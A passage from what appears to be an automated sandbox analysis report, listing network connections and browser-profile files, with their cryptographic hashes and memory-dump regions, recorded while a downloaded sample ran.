| N/A | 127.0.0.2:1688 | tcp | |
| US | 150.171.84.254:443 | p-ring.msedge.net | tcp |
| US | 4.150.240.254:443 | arm-ring.msedge.net | tcp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| GB | 23.213.251.133:443 | cxcs.microsoft.net | tcp |
| GB | 92.123.128.161:443 | www.bing.com | tcp |
| US | 150.171.28.254:443 | ax-ring.msedge.net | tcp |
| US | 20.237.255.146:443 | sjc22prdapp01-canary.netmon.azure.com | tcp |
| GB | 23.213.251.133:443 | cxcs.microsoft.net | tcp |
| GB | 92.123.128.141:443 | www.bing.com | tcp |
| N/A | 127.0.0.2:1688 | tcp | |
| US | 8.8.8.8:53 | s-ring.msedge.net | udp |
| US | 13.107.3.254:443 | s-ring.msedge.net | tcp |
| N/A | 127.0.0.2:1688 | tcp | |
| US | 8.8.8.8:53 | 254.3.107.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 9314124f4f0ad9f845a0d7906fd8dfd8 |
| SHA1 | 0d4f67fb1a11453551514f230941bdd7ef95693c |
| SHA256 | cbd58fa358e4b1851c3da2d279023c29eba66fb4d438c6e87e7ce5169ffb910e |
| SHA512 | 87b9060ca4942974bd8f95b8998df7b2702a3f4aba88c53b2e3423a532a75407070368f813a5bbc0251864b4eae47e015274a839999514386d23c8a526d05d85 |
\??\pipe\LOCAL\crashpad_3676_YMJZTNQEIDTESEEF
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e1544690d41d950f9c1358068301cfb5 |
| SHA1 | ae3ff81363fcbe33c419e49cabef61fb6837bffa |
| SHA256 | 53d69c9cc3c8aaf2c8b58ea6a2aa47c49c9ec11167dd9414cd9f4192f9978724 |
| SHA512 | 1e4f1fe2877f4f947d33490e65898752488e48de34d61e197e4448127d6b1926888de80b62349d5a88b96140eed0a5b952ef4dd7ca318689f76e12630c9029da |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6ab427e83ee238ad5110c17c6ff9f35d |
| SHA1 | 037eb697d38da4cec5b06ad57fb14de5002f2ca3 |
| SHA256 | 17de68adf45194cdce2ab2f4efb3f97ca7b6aa1de6492c79c1877da6610aa2d3 |
| SHA512 | 90d6e84c76efe44a5ad4ad1d034bbf854184d20d562c2ff0d8cf06c737c75cf7ae37f554b0855d7557ee2d81efff58838370b665256d4bd9c3fd592a8a908949 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7becf530ce8db86624c20f8f1e8ba9a7 |
| SHA1 | 30d8a928e042a20cac976049f25d6e2bf07cf85f |
| SHA256 | 5705fa2384a5f0cc66eedcc91c28ce5800997864cae506d12b10202bf7bba8f7 |
| SHA512 | f4c81ebe4c8269ece534de04e94cea73aa0ee9a7bc4f6fd6997e9d6eb058177937bdd1ab1f1ca3d63fcf35b32ff9c0405f2a9a4ad19ad0f3e7ddd3ec82a08454 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 94b7d7fb7e7a3ef8a77277b57b2954f8 |
| SHA1 | 4a5b7a2c3ee4c5dc120720edd4cd1d9d2d6473f0 |
| SHA256 | 3279101970221246b170ae21b9cfd4beda21af5990b00e66114e497a071074de |
| SHA512 | 1d4c35866b12ea33ff4a0a45753aa4859e5e2fa229b7b647e62d597c634375996fc83703faad47a61bb1be82ecfdebff86384e85f2b33e361410447d22fdfbc3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\12486804-1518-477d-bf3a-daef67e4301c.down_data
| MD5 | 5683c0028832cae4ef93ca39c8ac5029 |
| SHA1 | 248755e4e1db552e0b6f8651b04ca6d1b31a86fb |
| SHA256 | 855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e |
| SHA512 | aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3 |
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini
| MD5 | c677ffcba53645996354b58f158f2467 |
| SHA1 | 6ecf3288ffcd674fa49e7dcadc6194152d518474 |
| SHA256 | 21681039fcdf55b0821aeaf4a22727cffef451043ea20b9e8d32c3c70ee522ca |
| SHA512 | 69f420c1360145238f47565ba6c75dfa81facb28b4888e4511f44cf8ceadb1c787ab3846d205b6d42bacc2fd2bfc8194980cbb7c7f3615c6c9f5c73bde59ad59 |
memory/340-126-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp
memory/340-128-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp
memory/340-130-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp
memory/340-129-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp
memory/340-127-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp
memory/340-131-0x00007FFA415F0000-0x00007FFA41600000-memory.dmp
memory/340-132-0x00007FFA415F0000-0x00007FFA41600000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | 20c3d911d854a1ad3a23dd5c14cf46f5 |
| SHA1 | 18c00753e7c69c9ac72d24105c26df3aeedf37dd |
| SHA256 | 3f0d92df73264f702acca21fc7528bdc54b9cbd5ce837174f43d23a898d6aaec |
| SHA512 | fa97962a88e4387ebae245c1773104fb4059c6023222007b4636f8cd337edf41631470ffb2966bdf266ee5f8b334844bcf7e4fc836bf8c23f32506bb7b5585ab |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
| MD5 | 75cd2e9370a598ca3d9739f7099db9fa |
| SHA1 | 499633ac281f9dd7c414ed493b0b83b7a36d74a0 |
| SHA256 | 22a06bc02e2687e819099eef304a89fae729cbc1440b9814361e42c349e45406 |
| SHA512 | 9cd9d584869174d441db92afe813026bebac43d6b974b192591b6b652c0feb77b4421f21e47b7824a453e964c6a790a0bb5786857a134935a2b9b4a718dc9abb |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\odc.officeapps.live.com\FC08DE24-6982-4383-8DC9-F96DEE90B1CB
| MD5 | 2f82426450332b558a61ae9ca551abd9 |
| SHA1 | abdbf8f8bdd7572bcdefbd1e0b7da8d3cf17144d |
| SHA256 | 57d6315a8f1f11aaa111a9956ddd0d560f791f757c379ed77bbb5a1b5b577f52 |
| SHA512 | dbc43dab6cbde98647c5a88cd508a1528ef79c030286cf82cb4cb03c4af81930ad1c3b2644ead9eceea27cd5772324f42a51f04f1693102254567205a6abf0b5 |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\odc.officeapps.live.com\BA56246B-E8BF-402D-8F2A-144B027426F0
| MD5 | 85ad173999ed440af6120f3b4fd436fa |
| SHA1 | eebe3bae40b0c82db581b905e2a4c4a90055c9b3 |
| SHA256 | 2fb3e7ca57b5ec8657ff2b909c74dee246e7ed2b30abd60dec96fc4fb88bd165 |
| SHA512 | 3c506252a27bc4a3d718fc2ad89036850ee3c9d5fd79966fc5e28debe1844d96e8d2777e160e8537034129fd8109dff027bf5eb4a082c99d0db93730ec31427e |
memory/340-302-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp
memory/340-305-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp
memory/340-304-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp
memory/340-303-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | b29bcf9cd0e55f93000b4bb265a9810b |
| SHA1 | e662b8c98bd5eced29495dbe2a8f1930e3f714b8 |
| SHA256 | f53ab2877a33ef4dbde62f23f0cbfb572924a80a3921f47fc080d680107064b4 |
| SHA512 | e15f515e4177d38d6bb83a939a0a8f901ce64dffe45e635063161497d527fbddaf2b1261195fde90b72b4c3e64ac0a0500003faceffcc749471733c9e83eb011 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log
| MD5 | 224c263b451f148d0085893fcd9a4362 |
| SHA1 | 639c93f6b0fe0dfa1445d5280f35b5b86bf83152 |
| SHA256 | 9973edace5d82d771d84cb2d37748fdfb69a3035f5c6d07c69a216c49bc12abc |
| SHA512 | 98383c8fe3f6e7b17cfc1ac45c1bdda35c42ae25603ddf8dcb5550174b06e5e765f2c1107af221d1e1c47851726aab224eac229704460e38274c5218b083f960 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13375956196387213
| MD5 | 3a9b3bc19d9e1cb155fb1236a6a451b3 |
| SHA1 | 2333751bae8413fbf887a9a461b0d5fc3120f761 |
| SHA256 | 68f39817b9936555b762b886712eadb3d50859d935db9cb42137f404c83e4454 |
| SHA512 | fd95fb14fc3e52d7d221f0f4190ce8e92c715335173b78d83080049aae77895d7ba5753b02b088ea71ba4fbf164fab7f77745e1f57e14dae0e2e4e450288d220 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
| MD5 | ad45579c14fed88d6de509776b276eab |
| SHA1 | 57e3dc768ac38a0cdc69f31a9b0a358121fd23f5 |
| SHA256 | fa4bbe4f97bde3eb469948709d44572125aacf71c3e7bc297fda846a1a098422 |
| SHA512 | 54cd208764c41e6c3bd74c1c9f45c1f834a0befe9e98d3214ad45b4ded57e968067456593afc9504748e8f186f3aea4c171bb4f02a23914a5cb96742b6e94484 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
| MD5 | 6b2e3a87ce8dc564deae825db2471cd9 |
| SHA1 | b63d936790b5b5fd1b24dcf4eac710514372c000 |
| SHA256 | 082d006042e9fedc442be7fc825d1a7ed704fba1ea186588c7631dbc6a222fec |
| SHA512 | 890093b403cd88bf24cd4aeb2b005012ceb0999743a139d0784dfa3998d21ddcf87412643115633d31d3c0903c82eb9ef14e57e596c821bf30ecd1dd048404fa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db
| MD5 | c257c588bd3bb49f0205114aac6a0ee8 |
| SHA1 | 244953bdbb908480709d40835038dbc936076de0 |
| SHA256 | 10118dd89adc3f0c4774612793054789148c60157e00b5a455b148f05944f144 |
| SHA512 | 708ca133dad3013edffa311fcad74e8097090184a01ba9692a9e29c960a1abf54ef3d06cf29a5769e50196b5a5553ded6ac326b366e072525bb52173ad5c03b7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | a50dd3c3297300e953e05fac805df7ff |
| SHA1 | b3ebf0968949aeda0e8ce60db734e66e13052dc7 |
| SHA256 | f947cafce480f6d61d031ebabd0302a968f80b4216640c58c582b03ed8e04911 |
| SHA512 | 23f8e345ce12454b438ae84059de1f2945222977e7056467c749a56768a0ec70c9d4e184a789bc3fe162a903a5cc2f686f5684e442c854a80643ab4534ff338b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache
| MD5 | a9851aa4c3c8af2d1bd8834201b2ba51 |
| SHA1 | fa95986f7ebfac4aab3b261d3ed0a21b142e91fc |
| SHA256 | e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191 |
| SHA512 | 41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
| MD5 | f401be2207c57697bdd31604a152ff5d |
| SHA1 | 3b287ea3ce81e61229287d9434f0eacd5b24b70c |
| SHA256 | b53c7bf400b5c983ea34f3d5b5ece18388ea698078e78219a88b146615d6ea47 |
| SHA512 | 7cc7504f553868394f64d72eb3bce5951d223e861736f1408d8086764f35ae6bb755e314e5c8c608b2be9849e0f5e04961984283bc3dbb15e3b96498fc02c936 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | 7ddec00daa0a3af3fcbfaa488ca7f9c4 |
| SHA1 | 674ffa71893397ca1e0540e67233519c1e1f95d9 |
| SHA256 | ddb7724aeaa699c7061b3c97b0870170e1d1ab563e036b8bcf47bde6732a7c67 |
| SHA512 | 814c07eb854731981a1cdc1286f8efbf74284125d4ea7a5cfbaae7668a97086f89528af8cf9a94a7013e1cce94cfb121b8c4528d5eaf479af2ab32dd22b3e86f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
| MD5 | fa1af62bdaf3c63591454d2631d5dd6d |
| SHA1 | 14fc1fc51a9b7ccab8f04c45d84442ed02eb9466 |
| SHA256 | 00dd3c8077c2cca17ea9b94804490326ae6f43e6070d06b1516dfd5c4736d94d |
| SHA512 | 2c3184f563b9a9bff088114f0547f204ee1e0b864115366c86506215f42d7dbf161bc2534ccaee783e62cc01105edffc5f5dabf229da5ebd839c96af1d45de77 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e584c3381e9a9e619fc5105ab45dba0b |
| SHA1 | 98e5914b181c6a17d973ee03917785a457d72c66 |
| SHA256 | fa1949aaa7eef9097bb1e064471d38959f1b704c242c9937483a9440b6f244fd |
| SHA512 | adac4de69b7710fb6c4543ab52f0b57e70103a7247eca11539bf42b229625ab5f7fe17063903cb3dd2b792960a74644fceafecdf45839c9448e1ed966157188e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
| MD5 | 7ad01606b3f21a72a507303fea07464a |
| SHA1 | bcc5d788e9e2f275d7bf7e3ed1246b4bcfd6decf |
| SHA256 | 0798be6138b8126aff47dbcc13023b1b1fb354923b5c4fa0d214c79e635e969b |
| SHA512 | 36d566176c359e41dad4eb2924acdfd5c1d8cd831e7f20d752c0510a635c355417e32c282b4c81c7c5d43575c40f3afdc82cf1add3f064987d6b8ec786d73654 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
| MD5 | de73c0598447ec8628eb00f96c713f81 |
| SHA1 | be35125aed69c195996a5a5f97ea812f7f545bfa |
| SHA256 | 40cb3996cea4c190dae91fd2cedd282aa600e6dde0c2632018eaf4fe0e58fdc8 |
| SHA512 | 2c9965f5587e43cd5729eeebf6cb7fad662cf0f15895a10c3b6dc32a0c4051c399bfbbcd6df2598bb81442fe5aa2da68fc109dd6d270dc85625fc422409c47e7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
| MD5 | 6b0627d4af4a2d1bd4aeb6d540e5e944 |
| SHA1 | 8f2714b5a59914df1af49ea8030867b8b3bf17bc |
| SHA256 | 682aba58c2bf40427d69313b4f98956fe05aa4cefa4692e16146d5a33056878b |
| SHA512 | 1dad3f5c1f05ad6ca4680825b6da829f7cd997fab0bfd099e2f3e333fbfc37239a3e17424e8ba23ab75f1f3a693fe9e88355774757fe7e1871baefd4c76d1dad |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
| MD5 | 9bf1d8ab73190187028b17ce1a6487d1 |
| SHA1 | 1d1f6844c4158e6631716999fa399239237a3331 |
| SHA256 | 923d3fa3df52e0a767debca0d6f4dc7a983f4ef319d24611bb9a68fc833645cb |
| SHA512 | a7500a23924fa7a1bb637e69ac89e675c3232fe858b8264a160389755b22cc9960f13d2c7137be27c1e11cd0f780dfbf1837deef96662f8051ae0d576e0558d8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
| MD5 | f47a41e5639cfba7130af1f1d433c6a5 |
| SHA1 | 4a5a1970a3b58b0e64a4eaf339bb026193d8f080 |
| SHA256 | 03c3e1ef4600553a8b7a398acc63bab90176c583efc8c2bcbac6a76adcf214c8 |
| SHA512 | d56a4f31bec0bee521d43795321c1da4c72e3601d16a94f2657715d1bf3f40deed98152018f1db258a5864e51f851798c3c53934802fdd4e253f3807a5a1057c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
| MD5 | c6c9214af10a9b021d15ac9a727818c6 |
| SHA1 | fefb8858eb505bd6f60e84b24dd05f0a52c5d224 |
| SHA256 | 0be4c582418b1d495e5a9568ea1fba6c8c765b29ad42747b6315486a07782485 |
| SHA512 | d0fa8072193f7fe41e3c6bcd4cec197f12925d22cfb7ff0368cde855de5b66d6a3e597a58179c0729763b6f2c1c688f5e475d0a12d080b47c7d75a75fbe55263 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
| MD5 | b351465599b4df79a0c34485def008c1 |
| SHA1 | 3b9031a4b84ff065176ed551efa2a9f3f9c62aab |
| SHA256 | 63adf51bd5f7d4c2bafe82526a9e338a0ae67d0374c37b6656a668c4e9ea5603 |
| SHA512 | c373ea279b6abd6fabf6083270cf264d660c8b4f5fbd3ba2e1e63d83d5adede0303753aee1dcb6feb5762e08be015669313936b01ee4f35a5bd418955f93d8ec |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13375956196143213
| MD5 | 3ac3a20592b6facd78008edc0963d721 |
| SHA1 | 4ea6cd314f124186e0a52173dfa1693acb515c5b |
| SHA256 | 20491d820d8ef873fb58aa07ac9fff806845f3af7f4deb8c23f7753511d57caa |
| SHA512 | 9284de2fbe5d1f073f11a2c1bf1f788888bde78e73c7da0a8f02e89c378447eea911b95af6f0802a9bf75adea93f8befa5298be54d3d459d09c1d8251bafc7cb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
| MD5 | 8ada3f5b3a5a57d9c1b3affaf8ae4cc6 |
| SHA1 | 35bc23fb9529bdd24a8b1d1b0a7a1fc34ba13757 |
| SHA256 | 3d5fd34014a4bdb4fe6a3040d79fd388a8ab6b9a49512e304e5e8a5fab1eef41 |
| SHA512 | b59757626085cec78410fa1d69193995c2c99ad36fba501224bc6fe1ec27b90bfe2351556e1abfcc7fc603f120f895d947b52b02ba375ee010947783f3bbc5e1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt
| MD5 | 49e590cce51514b4ac36f0457dff073f |
| SHA1 | 30b259df16cf8b9822142a9b45eacb030b5baead |
| SHA256 | c4e818aee6fe53ef3743a392933d4d50e542f1855df5439d12135fab4776a76c |
| SHA512 | c5571ed3aca82bdb8cf6626883809bbfd9043d762835c99f051498dc4655cbf1f1b41050459ad230f68cf473c9e2b96b80affffcca0d5470dc49dd3101ca24c5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 79888c3068a17722956d3c248d2fa2f6 |
| SHA1 | 31c8e50c2f34be5bf141efbed437248f7088268c |
| SHA256 | 1ae22c30b23c02121a375f4fb7112f9690126999a9a20f588b18db4415a18915 |
| SHA512 | 3bdfcfcdb70bd2976bc86c499109e497e38a4738c25d351348aed7be1b6f909aaa2ca61d7d4c859d10d176c45484b9b311ca529bcc1e273d1bcaf43794a1472f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 14e3e95df695f16fa4e9a67b3451fe24 |
| SHA1 | 3a4b6eb1aaac5b82fe4b31696898899229cd499d |
| SHA256 | 44db724e917d922f8ce163c35ba179f162f2f9394e71526225464a8dd50848b4 |
| SHA512 | b31c9c998d8e9758be5d7e1a96256491f1e1138c3504b58b46fcf1b16c7af66949605053dddfac435acd52fe2369430d13fd0807dfd8afa4e3329a9e30c55a9c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
| MD5 | fb2f02c107cee2b4f2286d528d23b94e |
| SHA1 | d76d6b684b7cfbe340e61734a7c197cc672b1af3 |
| SHA256 | 925dd883d5a2eb44cf1f75e8d71346b98f14c4412a0ea0c350672384a0e83e7a |
| SHA512 | be51d371b79f4cc1f860706207d5978d18660bf1dc0ca6706d43ca0375843ec924aa4a8ed44867661a77e3ec85e278c559ab6f6946cba4f43daf3854b838bb82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | 2e86a72f4e82614cd4842950d2e0a716 |
| SHA1 | d7b4ee0c9af735d098bff474632fc2c0113e0b9c |
| SHA256 | c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f |
| SHA512 | 7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006
| MD5 | c3c0eb5e044497577bec91b5970f6d30 |
| SHA1 | d833f81cf21f68d43ba64a6c28892945adc317a6 |
| SHA256 | eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb |
| SHA512 | 83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007
| MD5 | 56d57bc655526551f217536f19195495 |
| SHA1 | 28b430886d1220855a805d78dc5d6414aeee6995 |
| SHA256 | f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4 |
| SHA512 | 7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0f71e89d9c27f488155cff38b1662577 |
| SHA1 | 5f4f7d08f47765316c3151b5c7c4506063501c7b |
| SHA256 | d4ab3542157805958ff1d98365225295d49f3e7ce332119efdc3065a72122753 |
| SHA512 | 20c0ddc285a25f45f6ec9c394fbdfb8355ea33c00bda2242bdf43ebe5fc2477219c529ab88bbac297c97f55f9597f7f6590ef1813fcc90cc651ba3ee4a6c79bb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
| MD5 | 8229785dfae2fc04fdc60d6ddb1e67c4 |
| SHA1 | d4e7b6ad7a7fef253db4628553475deac68fc74d |
| SHA256 | 9b366b349a146a7487fdca139bd38ab7e1d1f7787f050342ec7fac85bfd90d42 |
| SHA512 | 8bb3c3b986177a9edb10a3a869333994f34704a21ead819e4489db96bfa9ea2f337bc5c2ca6e6bc743b2e17b7df91a28f0b5c1ee9a9719a565b973baed74b871 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
| MD5 | 7bf4cdfdf458a818bf9d41816e0350ae |
| SHA1 | 4449eac3231936d1aac4009c5d06a955bcf1081e |
| SHA256 | 3bff6ebf86a03846824de39225e9efb64d64c3f967ea33fc0a67d4fdc1f38b4d |
| SHA512 | 1db9da363b8627418f05b9d2de23f7d64f534ed3c50b856bb4c38eb623ff304a146e4c55f0a04ddc88a81cbe262b773dee3cde337cd8c0ece1f4089ab74968dd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8c67731f0ec7366e23741c5ee2e5ed34 |
| SHA1 | 8bd86a2839a0210b2edf0f2e5d1031e4b5500003 |
| SHA256 | b238914fe9e7aacde3c8378304b4c636e60dded5f1d387711a771d2f44090049 |
| SHA512 | 0bac3297aac0162c661133d2282b89980c39ea4eb309f29657b01b485d574998ba0aabee0e2714f54533f4720f19540d302d3639a90e5661d65f98e74f0c84ca |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5e1c11.TMP
| MD5 | 5f3a19a2f71ba88b1c27542567bcf7ed |
| SHA1 | d9519f95e96452a45197b0079a7b27647b650812 |
| SHA256 | cce2a62cc21db8ab28c9cdbd0467847c3d6ae113708f43afbe135e8fd8b53e27 |
| SHA512 | 84db15565dcf1d9b1fc992b5a0843edb5c4e15e5ed9fae1d37bf2fd7b7111c4349511057ef559f863535379c9fee3107efaf525ec7273437894f97d02a492e63 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ba69fb095f810909f5d25f92a18c1208 |
| SHA1 | e65ca6628cecf9a04ef733d42058c576e41b1e5e |
| SHA256 | 814f39cfd9a57387a3bad316bf8269c76e9f82d2f3b95cbf59ab8bbf4f80bd43 |
| SHA512 | 58016765750783ef3d3bbad989b17ab927519f8724299532c349286fae4e2dfe22c3af6d45a56094723d09999ff01a59b7547e104c940bd3c61c22f11614001d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d
| MD5 | 674b847b91b54605881f679e4a57384d |
| SHA1 | 49279a9b38b0629e6f9ddc745bb0821a5e462d99 |
| SHA256 | 1b2d044f43fa14d46d571f956231797dda83bc4dcc8b6e5e5e202738307aea68 |
| SHA512 | fd33d41983406aa7190b896b52981caf1d55de47b6c60d8174cbf6c729c773f66ccd9ac29db5e5415df9dfdb30abb884e512b32767d61ef912a48791a0a7785a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010
| MD5 | 68ae27277292cae62c51b7b6406d1817 |
| SHA1 | 7b7ad6bf095ceb959c2b37645976df92aa5b8c51 |
| SHA256 | 1c06edee2f170fcc229b9305c947de45cbe23f2b9dfec31adcf2d4f0c958058b |
| SHA512 | a51562266c7d94b8f6b87407c7dc590a157182129bf55178518ead38f6632724cac6156a9da53029fe418e9efa28b66dfdc2b79dc172fd2ac1da32dd1b193985 |
C:\Users\Admin\Downloads\Unconfirmed 506997.crdownload
| MD5 | c16f86882d5a102ed7a0fbbc0874d102 |
| SHA1 | 4e3ac7a53f0f368b9218bf717162d5e073a0f7df |
| SHA256 | 1687311b4e7a3720be20490e8ed6cc772a32336a7bed8896e475b8ec616c6b81 |
| SHA512 | 90b7aac54467b266a9dd9ce7c83a156d3d99f7aeb1ad0e3e2ef5516b38270112dae07892e3e80765c3508484e3ee66e7439db0512a63b48f64e6b15e83285f67 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | ed5476de2d270693c21f0f331d786f24 |
| SHA1 | e3bde4ab36fb07dddac8b862cfc484d8a7cc56a5 |
| SHA256 | eddbd43c8634a6aa13bd1e89479f34a0bae0e84bce1cbc4fdea613e931952087 |
| SHA512 | 432e6f56e275cf6bd45013229c3e8deebc99dc605f2799766fd876672a94df7ae143e3e5bab9079b72f1b765b93d8938fa3b81aa984aabf4612cce1f851c34f9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6f059000b406117eb89ea68370d4c555 |
| SHA1 | 111c4ad71d010ac43a0c760bb8edc943843187f4 |
| SHA256 | 66afb3f90047ef59f2dc67563d54c5665f43fa61c501a8f8fe6df970c1188d6c |
| SHA512 | 51dac35e7c3be8402bcc950626d4616cec356958d38956259f50124e5b2fd987c6a918fab066e56ae51c98a52930e8afb35fe04f17f1346d416e5193b5c73aa2 |
memory/5876-992-0x0000000000400000-0x000000000042A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 1f3ed0d4cf310f7f7db58cf8a7161856 |
| SHA1 | 9074111554d27b4f2b270f53d46410381138b793 |
| SHA256 | 628f2684c0cc2eed4c3c4318fd7c00b59c1e5ff973d0a6843ca65c8f43b4985f |
| SHA512 | 5f6993e45dc8dad8ef95c6dd4642baee7fdc669282c2c745c5469aedb94fa3b307511f92a325cdb07597099f4e576ceed9de8cffd82c57c4cf43d3f102459dcd |
